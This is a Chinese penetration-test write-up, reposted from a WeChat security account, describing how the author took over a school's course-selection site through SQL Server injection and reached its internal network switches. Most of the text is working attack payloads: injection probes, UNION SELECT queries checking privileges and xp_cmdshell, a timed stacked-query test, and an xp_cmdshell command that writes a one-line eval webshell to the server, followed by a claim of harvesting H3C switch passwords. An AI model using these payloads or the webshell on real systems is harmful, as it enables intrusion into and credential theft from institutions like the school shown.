通过sqlserver注入拿下某学校内网多台交换机权限

admin 2022年3月1日10:42:31安全文章评论48 views1458字阅读4分51秒阅读模式

之前授权任务打某个资产。其中碰到了这个学校,是通过sqlserver打下的shell记录过程比较简略,也没有很复杂的技术,希望哥哥们不要见笑。





一)功能点浏览探测

浏览学校站点,发现了这个选课系统。

通过sqlserver注入拿下某学校内网多台交换机权限

对这个选课系统进行sql测试。发现物理路径d:bbookszxyyanjiuxingxuexiyingyuankc_show1.aspx.cs

通过sqlserver注入拿下某学校内网多台交换机权限

一开始以为是报错注入,但后来发现是字符型注入/szxy/yanjiuxingxuexiyingyuan/kc_show1.aspx?kcbh=1' and 1=1 and '1'='1

通过sqlserver注入拿下某学校内网多台交换机权限

判断出是字符型注入了,下一步得判断回显行数

/szxy/yanjiuxingxuexiyingyuan/kc_show1.aspx?kcbh=1%27%20order%20by%2011--+    (12报错 11正常)

通过sqlserver注入拿下某学校内网多台交换机权限


/szxy/yanjiuxingxuexiyingyuan/kc_show1.aspx?kcbh=-1'union select null,1,2,3,4,5,6,7,8,null,null--+

可以看到1-8都是有回显信息的

通过sqlserver注入拿下某学校内网多台交换机权限

二)信息收集

所以开始信息收集,sqlserver版本是多少?在什么主机?权限是什么?有没有开启xpcmdshell

判断主机、判断数据库版本

aspx?kcbh=-1' union select null,(select @@servername),2,3,(select @@version),5,6,7,8,null,null--+

通过sqlserver注入拿下某学校内网多台交换机权限

判断权限、判断是否开启xpcmdshell


aspx?kcbh=-1' union select null,(select IS_SRVROLEMEMBER('sysadmin')),2,3,4,5,6,7,8,null,null--+

通过sqlserver注入拿下某学校内网多台交换机权限

aspx?kcbh=-1' union select null,(select count(*) from master..sysobjects where xtype = 'x' and name = 'xp_cmdshell'),2,3,4,5,6,7,8,null,null--+

通过sqlserver注入拿下某学校内网多台交换机权限

为什么要看任课教师的地方有没有1呢,因为如果判断是存在权限,就会返回正常,如果没有就不会存在1,例如 sysadmin去掉sy

aspx?kcbh=-1%27%20union%20select%20null,(select%20IS_SRVROLEMEMBER(%27sadmin%27)),2,3,4,5,6,7,8,null,null--+

通过sqlserver注入拿下某学校内网多台交换机权限

所以可以判断出,具备sa权限、开启了xpcmdshell


三)解决问题

 

问题点在于,xpcmdshell不能执行命令?!排查下问题所在

?kcbh=-27';WAITFOR DELAY '0:0:5' --+ 页面是迟缓了5秒,证明堆叠查询是有的

 

有堆叠,有路径,有权限,直接写入webshell

.aspx?kcbh=-27';exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > d:bbookszxyyanjiuxingxuexiyingyuanxuexi1.aspx ' ; --+

 

通过sqlserver注入拿下某学校内网多台交换机权限

通过一波信息收集,发现H3C内网交换机的账号密码

通过sqlserver注入拿下某学校内网多台交换机权限

通过sqlserver注入拿下某学校内网多台交换机权限

后续内网渗透,就不再记录了。反正是刷了一波分!

收工!

通过sqlserver注入拿下某学校内网多台交换机权限


 


本文始发于微信公众号(NOVASEC):通过sqlserver注入拿下某学校内网多台交换机权限

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月1日10:42:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  通过sqlserver注入拿下某学校内网多台交换机权限 https://cn-sec.com/archives/495382.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: